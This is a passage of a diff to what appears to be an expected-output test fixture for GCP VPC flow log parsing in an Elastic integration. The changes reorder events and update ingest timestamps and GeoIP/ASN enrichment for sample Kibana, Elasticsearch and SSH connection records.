"country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 59924, 
@@ -25336,6 +26569,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415306080Z", + "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:08.092659117Z", + "end": "2019-06-14T03:41:08.213471928Z", + "id": "14iipwlfd8t015", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25347,61 +26590,54 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", + "10.139.99.242", "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 115 } }, "source": { "vpc": { "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392594600Z", - "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:08.092659117Z", - "end": "2019-06-14T03:41:08.213471928Z", - "id": "14iipwlfd8t015", - "category": "network", - "type": "connection" - } - }, - { - "log": 
{ - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65273, 
@@ -25415,6 +26651,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415306489Z", + "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378287Z", + "end": "2019-06-14T03:49:56.316930467Z", + "id": "14iipwlfd8t01h", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25426,25 +26672,24 @@ "iana_number": "6", "packets": 599, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "192.168.2.73", + "10.73.186.17" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 115 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25455,23 +26700,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 242 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392600100Z", - "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378287Z", - "end": "2019-06-14T03:49:56.316930467Z", - "id": "14iipwlfd8t01h", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.73.186.17", "port": 22, 
@@ -25494,6 +26730,16 @@ "ip": "192.168.2.73", "packets": 5 }, + "event": { + "ingested": "2021-12-14T14:43:27.415306977Z", + "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:23.705320616Z", + "end": "2019-06-14T03:42:24.922448897Z", + "id": "14iipwlfd8t019", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25505,17 +26751,22 @@ "iana_number": "6", "packets": 5, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.73", - "10.73.186.17" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -25532,25 +26783,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 242 + "ms": 95 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392605600Z", - "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:23.705320616Z", - "end": "2019-06-14T03:42:24.922448897Z", - "id": "14iipwlfd8t019", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, 
@@ -25559,13 +26795,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65277, @@ -25573,6 +26812,16 @@ "ip": "67.43.156.13", "packets": 729 }, + "event": { + "ingested": "2021-12-14T14:43:27.415307365Z", + "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760385211Z", + "end": "2019-06-14T03:49:56.316890309Z", + "id": "14iipwlfd8t016", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25584,19 +26833,27 @@ "iana_number": "6", "packets": 729, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.87.40.76", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25607,36 +26864,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 95 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392611300Z", - "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760385211Z", - "end": "2019-06-14T03:49:56.316890309Z", - "id": "14iipwlfd8t016", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34646, 
@@ -25650,6 +26891,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415307852Z", + "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:10.413494375Z", + "end": "2019-06-14T03:48:10.529592195Z", + "id": "14iipwlfd8t01c", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25661,22 +26912,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC" - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -25687,23 +26940,11 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392616800Z", - "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:10.413494375Z", - "end": "2019-06-14T03:48:10.529592195Z", - "id": "14iipwlfd8t01c", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -25712,11 +26953,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34646, 
@@ -25724,6 +26970,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415308249Z", + "original": "{\"insertId\":\"14iipwlfd8t01d\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:10.529541195Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:10.413397239Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:10.413397239Z", + "end": "2019-06-14T03:48:10.529541195Z", + "id": "14iipwlfd8t01d", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -25735,43 +26991,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:19.219Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.14", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST" - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392622300Z", - "original": "{\"insertId\":\"14iipwlfd8t01d\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:10.529541195Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:10.413397239Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:10.413397239Z", - "end": "2019-06-14T03:48:10.529541195Z", - "id": "14iipwlfd8t01d", - "category": "network", - "type": "connection" } }, { 
@@ -25786,11 +27005,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33876, @@ -25862,7 +27086,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392627800Z", + "ingested": "2021-12-14T14:43:27.415308662Z", "original": "{\"insertId\":\"14iipwlfd8t01g\",\"jsonPayload\":{\"bytes_sent\":\"5044\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"87\",\"reporter\":\"DEST\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", 
@@ -25884,11 +27108,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33574, @@ -25960,7 +27189,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392633300Z", + "ingested": "2021-12-14T14:43:27.415309045Z", "original": "{\"insertId\":\"14iipwlfd8t01l\",\"jsonPayload\":{\"bytes_sent\":\"14132\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"91\",\"reporter\":\"DEST\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.468484109Z", 
@@ -25976,11 +27205,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33574, @@ -26058,7 +27292,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392638900Z", + "ingested": "2021-12-14T14:43:27.415309440Z", "original": 